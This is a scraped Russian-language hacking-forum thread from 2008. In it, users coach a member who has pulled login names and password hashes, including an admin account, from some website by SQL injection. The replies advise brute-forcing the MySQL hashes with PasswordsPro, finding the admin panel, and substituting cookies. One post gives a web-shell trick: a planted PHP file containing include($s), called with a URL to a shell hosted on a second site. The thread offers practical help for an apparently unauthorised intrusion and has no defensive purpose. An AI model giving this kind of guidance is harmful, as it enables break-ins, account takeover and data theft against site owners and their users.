ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1341  
Старый 23.03.2008, 17:54
Spaise
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208

Репутация: 21
По умолчанию

Цитата:
Сообщение от mff  
Если кто то может помочь быстрее помогите плис ! Вот что выдала скуль - u15364/6cb1963d2018c3ea и admin/54e0c6945fa5e34c

Заранее всем спасибо!
Ищи админку или можешь попробывать зарегистрироваться на сайте и подставить в cookie свои данные, если cookie используются. Admin и u15364 - логины наверное, а то что после них - хеши. Про хеши читай здесь -> http://old.antichat.ru/txt/hashes/
Что тебе еще надо?
 

  #1342  
Старый 23.03.2008, 18:08
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Цитата:
Сообщение от Spaise  
Ищи админку или можешь попробывать зарегистрироваться на сайте и подставить в cookie свои данные, если cookie используются. Admin и u15364 - логины наверное, а то что после них - хеши. Про хеши читай здесь -> http://old.antichat.ru/txt/hashes/
Что тебе еще надо?
Спасиб, почитаю, сейчас перебираю при помощи PaswordsPro, но боюсь что это на долго...

а ССЫЛОЧКА отстой. Нету там ничего по mysql. И всё равно спасибо!

Последний раз редактировалось mff; 23.03.2008 в 18:13..
 

  #1343  
Старый 23.03.2008, 18:10
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

Цитата:
Spaise как вариант можно залить фаил с содержанием <? include($s) ?>
назовём его a.php к примеру тогда шелл подключается таким образом
http//site.com/a.php?s=http//sait2.com/фаил с шелом .php
в место include() можно использовать ещё и :
readfile()
fopen+fwrite+feof+fread
file_get_contents()
require()
не говоря уже про system('curl/get/fetch/lynx/etc')...
почему сразу <? include($s) ?>

а если register_globals off? а если url access disabled?)

Последний раз редактировалось blackybr; 23.03.2008 в 18:21..
 

  #1344  
Старый 23.03.2008, 18:18
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

mff,
_http://injection.rulezz.ru/ по ижекту почитай..
 

  #1345  
Старый 23.03.2008, 18:55
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Цитата:
Сообщение от ReVOLVeR  
mff,
_http://injection.rulezz.ru/ по ижекту почитай..
Ага, спасибо, читаю там SQL инъекция в сервере MySQL, по этому руководству вобщемто и делаю, но вот не всё там понятно как то...
 

  #1346  
Старый 23.03.2008, 18:58
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

дак ты спрашивай что непонятно для этого и топик собственно..
 

  #1347  
Старый 23.03.2008, 19:13
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

непонятно ReVOLVeR что делать вот с этим: 6cb1963d2018c3ea
Как подобрать парольчик, это всё что мне нужно...
Тебе спасибо!
 

  #1348  
Старый 23.03.2008, 19:24
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

2 mff
Это mysql хэш, юзай прогу для брутфорса хэшей passwords pro, если не знаешь что такое хэш, иди сюда - http://forum.antichat.ru/forum76.html
 

  #1349  
Старый 23.03.2008, 19:26
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Подскажите как правильно подобрать пароль к хэшу mysql при помощи PaswordsPro. Каким перебором лучше пользоваться? Может есть какието базы паролей?
 

  #1350  
Старый 23.03.2008, 19:29
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

0nep@t0p я ей и пользуюсь, атака полным перебором, но вот незнаю найдет он что нить? Подскажи, как правильно ей пользоваться. Она у меня все процессы сожрала...
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ